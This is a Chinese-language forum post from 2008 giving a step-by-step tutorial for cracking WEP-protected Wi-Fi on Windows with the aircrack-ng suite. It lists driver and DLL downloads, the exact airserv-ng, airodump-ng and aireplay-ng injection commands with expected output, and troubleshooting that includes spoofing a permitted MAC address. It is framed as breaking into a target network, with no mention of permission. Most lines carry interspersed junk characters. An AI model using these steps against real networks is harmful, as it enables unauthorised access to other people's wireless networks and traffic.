上等兵
- 注册时间
- 2008-7-25
- 金币
- 63 个
- 威望
- 5 个
- 荣誉
- 0 个
累计签到:2 天 连续签到:0 天 [LV.20]漫游旅程
|
使用airrack和注射式攻击来破解WEPA首先你需要正确安装网卡驱动: 如果你的网卡不被commview支持的话,那么你需要安装wildpackets的驱动.
# v m/ A1 ~% A9 a. ~5 v; d! mA1如果你的网卡被commview支持的话,那么点下面的地址下载驱动:
8 h3 W2 [; N6 y3 K7 O6 X, m. t4 Fhttp://www.tamos.com/bitrix/redirect.php?event1=download&event2=commwifi&event3=&goto=/files/ca5.zip- I: U0 Q! m4 z5 V$ t: o
A2 如果不被commview支持的网卡则可以下载widpackets的驱动:; E( E& B& K! g" u3 k. p! Y
http://www.wildpackets.com/support/downloads/drivers& w# d0 u! W& h4 y3 a
注意:下面的教程是在你正确安装commview的驱动的前提下进行的!6 ?$ H! K" l) ?0 F5 H9 d1 A5 b! u
B 你需要下载这个.dll文件(只适用于commview 的网友): & r! n/ q, F& _. U: w
http://darkircop.org/commview.dll, C& b5 j% A3 c! H: i [0 u: O: X
?& @ F6 k& ^+ M; tC 你需要下载aircrack 压缩包: http://dl.aircrack-ng.org/aircrack-ng-svn-win.zip
; S( g5 y! U/ `2 w* W; a7 S. @: Y& Z# o, ~
D 解压aircrack 压缩包到你的任意硬盘根目录,在这里我是解压到c盘
) e" X1 ^# }4 |
0 [' R/ d C. \3 l- F! \E 把B下载到的commview.dll 放到D解压的文件夹,应该放到目录c:\aircrack\
' l. v/ i' v5 H/ U
) j3 q# t% w1 d, n5 zF 去目录c:\program files\commview for wifi\(注意这个目录是安装完commview以后才会有,也就是A1你下载的文件),然后找到”ca2k.dll”文件,把”ca2k.dll”,拷贝到(c:\aircrack).; Q5 N6 D/ c' n! O" A. t
% o9 `2 z% `, ^9 n3 j7 `当你完成以上准备以后,就可以开始正式的破解了!
. o' C, ]; o' s原文提供的连接无法下载
5 l/ v0 l* }* M5 }
. i8 e5 m2 S% l" `2 R特提供以上文件的合成包供下载
; l" Q' ]7 l* {* Y3 z8 W密码:password% k/ b/ A5 u& J* Q+ a) ~1 q! @$ _
% C' \( _2 y3 W+ Q. z& D破解:
2 U/ F; p- Z: S. r& {1:打开一个命令提示符 (开始 > 运行 > cmd.exe)! ^6 m7 Y! r! R& R6 P' ?
$ y5 G3 r" d7 Q: X. P0 j5 [2:在命令提示符窗口下面输入:2 i4 \+ V3 S# r
Cd c:\aircrack $ P: m/ k q# Y" u9 I/ K6 M. ]: X0 Y
-按下回车
) u {% E- T4 I/ P3 {& v
& y6 Y! c' \+ U e$ t9 S ~, Z3 在命令相同的提示符窗口下面输入:
. a$ f) P- x: A/ _$ d airserv-ng -d commview.dll
; D0 d7 a9 G; I$ `& g-按下回车 $ ~$ L# W4 H$ z$ i4 w) U+ p; P
你看到的回复应该跟下面一样:# w: x. P2 ]' T* a
# L% [/ S/ L% W+ Q" Z6 ]
Opening card commview.dll 2 ~0 A" o- Z+ N- A
Setting chan 1
7 G( Y% i6 @: r w5 u$ R/ D! d8 POpening sock port 666 / w* Q7 ]' A0 D
Serving commview.dll chan 1 on port 666
8 Y! k, ]: z) r/ I5 O8 x8 T" L3 O
( W$ q k+ s* }/ z {如果你没有看到上面的结果的话,而是看到下面的结果的话:( o2 ^& v" E2 J9 L; y! O% q9 t" S/ s
/ V/ A& q. ?3 L3 m
注意这里可能会有两种情况出现!!!!!:: e3 i1 n1 u4 F( l2 j: C' B
: K8 E9 N. S/ } w
(1). U3 R$ J; M+ {7 B* }
"Opening card commview.dll
' U# u. b" a* `8 d0 b2 I# k) d4 ZAdapter not found $ k" Q2 X3 [2 d
get_guid() / x* ]" K$ h$ I* d) y R
airserv-ng: wi_open(): No error") X1 R0 S* m" r3 I4 h b. j
+ C1 _0 O2 U% V r
这种情况那么你可以试试这个命令:' a _6 }8 j+ Y: _, i# e5 V" i
# c+ U9 g g" o5 y
airserv-ng -d "commview.dll|debug": r! Z4 T, k; b' v$ o3 H
5 p$ G+ _& B; q1 d$ \然后你可能会看到下面的结果
) }+ S' B2 g0 w5 b1 `( b+ V: q$ r4 W
Opening card commview.dll|debug ' x- A3 D$ h: Y0 j" d$ r! N
Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470
4 D! d6 C) `# x0 v0 C1 c- tget_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co
+ ~, z$ b* F9 N% LmboCard Gold - Paketplaner-Miniport
8 S" M" [( @, l9 N+ @Adapter not found
% [. s& g" F3 y5 s% _5 eget_guid() , R& W+ S7 M# n9 C
airserv-ng: wi_open(): No error2 C) o$ }! J2 h" j K! W
! b- ?* }) } M6 M9 A* o那么你只要输入下面的命令就可以了, }0 a# g1 i; D/ Y# p' ~
; ~$ m q3 y6 P S8 iairserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"" G0 @4 m+ P" _/ T
5 g8 t' n. m% W4 g0 l
或者会自动搜寻网卡,然后提示你是不是这个网卡,然你远yes/no,那么你需要选择yes就可以了
' _% U# J. \9 O5 R: N7 |$ V. x0 a9 e Q$ p& H2 k
(2)$ L' j. z# i" }1 n& Q
"Opening card commview.dll 7 U- r4 Y$ @6 k) R/ S( L
F1 & |9 I( q) E( u& p
init_lib() 9 C' y* c% j0 @
airserv-ng: wi_open(): No error", Z* k+ M8 I8 R3 [$ M: y
( s( Y- u8 U# z# r) k1 Y
这种情况的话,那么你应该是由于安装了,windpackets 驱动而产生的问题,那么建议你安装commview 驱动,如果可能的话./ [6 Q( f! n5 k3 a& N9 r
4 T: Q6 g$ C) G( w) ^, n4' T2 O% f$ _9 G- h. z
-注意现在重新开一个新的命令提示符窗口(我叫它窗口2),不要关掉前面的那个(窗口1)!!!
* C2 I$ V- O) L5 ~-在窗口2输入命令如下:$ w: H$ U6 F9 e5 J1 |4 Q9 l" o
cd c:\aircrack\
/ {: `0 L- }2 d0 s按回车' a% J* `/ y9 o) g! h
& j; p. K2 f8 }8 `5
; {6 x/ U o4 C1 C" \3 T+ K-在窗口2输入命令如下:
1 K3 G- o t) B& _- N+ M" a6 B) ^ airodump-ng 127.0.0.1:666; Z# W9 ~9 ?6 v6 C; b
回车
& F5 L7 U4 n3 v7 Z' I
' y& [# _& W" H& ^/ k# d提示: 如果你知道需要监视那个频道的话,那么你可以输入以下命令,我建议你这样做!!!:
3 z8 p/ O0 V1 Q6 E3 o6 G& k# O& J6 F7 J5 z) M
airodump-ng --channel 你的频道号 127.0.0.1:666
U+ B) | U9 l6 E$ u( j9 v: ^ 比如说我需要监视的频道是6,那么命令如下! K6 U+ v- i% W% U; t
1 G0 `: O3 F) j% l
airodump-ng --channel 6 127.0.0.1:666, M2 Y( f, U, U( p
3 e7 n' I7 {. d& K好了,现在airodump-ng 现在应该已经开始截取数据了,后面我们会使用注射式攻击来提高数据包的获取速度.0 c& p" t3 X1 Z q7 y
6
) _, g; N# C& o5 b" B现在重新开一个新的命令提示符窗口(窗口3),不要关掉前面的(窗口1)和(窗口2)!!!
8 w4 e% k" Z5 R n4 [( t-在窗口3输入命令如下:
' N% X; u$ [ W8 \1 c& V, H$ A9 j8 O cd c:\aircrack\
7 e" W# ]6 w; Q! {/ N* {按回车
9 e2 ~: m1 C4 o7
1 S6 q& v8 P% v" ~5 D+ B# D在窗口3输入后面的命令:
8 i9 e* i/ P; o! h- w, ^8 haireplay-ng -1 0 -e 你想破解网络的ESSID -a 你想破解网络的BSSID -h 你用来监视的网络的网卡MAC 127.0.0.1:666
' Y* x# |7 z W1 j8 E" D7 [- K% `实例:) e1 o5 N" d+ S0 G
ESSID = wifi16 5 ]' R/ _' K$ I: \5 c3 ?
BSSID = 11:22:33:44:55:66
* S2 P! ~% W/ ?( `% S& z' n* ?MAC = 01:23:45:67:89:01+ L' ~2 k4 a' j( J- q6 f) S E% e8 h
提示:
5 p! r- f! Y8 x6 [9 B你想破解网络的ESSID = 破解网络的名字 (wifi16, mynetwork), v" W( H* E! L+ A
你想破解网络的BSSID = 破解网络的MAC (11:22:33:44:55:66)6 f S4 u7 Y) @* r' t2 }
你用来监视的网络的网卡MAC = 这个就是你的网卡MAC咯 . C% I. h+ h. S4 ?+ z; f& b# X4 i
那么命令行应该是:( V6 y4 a* I! g; o% o& P% b
aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:6661 I1 g* `9 ?8 o% K9 U* Y9 D
如果一切正常的话那么你会得到下面的回复:, v( m$ O6 i$ T, q
Sending Authentication Request
3 z4 q+ b5 c+ W' l6 ^Authentication successful & P# X! L0 j; c7 q6 [8 o
Sending Association Request % [& j3 O( j R8 c a5 X
Association successful+ n, j9 A! \( ]7 ?; x/ s' C9 Q9 u
如果你得到:
5 `( u# i3 X! a( E4 a. V9 e$ }AP rejects the source MAC address
R! L |# H q+ c这说明你破解的网络只允许特定的MAC 访问,那你你需要把你的MAC地址改成破解网络允许的地址.% O% i$ d6 M6 v* S, Z' _
如果你持续得到:/ t f1 c; O0 {( ?0 u
sending authentication request% H# G- F5 R! T
那么说明你离破解网络太远了,信号太弱,你需要离破解网络跟进一点,以获得更好的信号.
0 F8 d2 r8 H7 `- p' S
- [, k V) s6 u[ 本帖最后由 fzulib 于 2008-9-5 16:01 编辑 ] |
评分
-
1
查看全部评分
-
|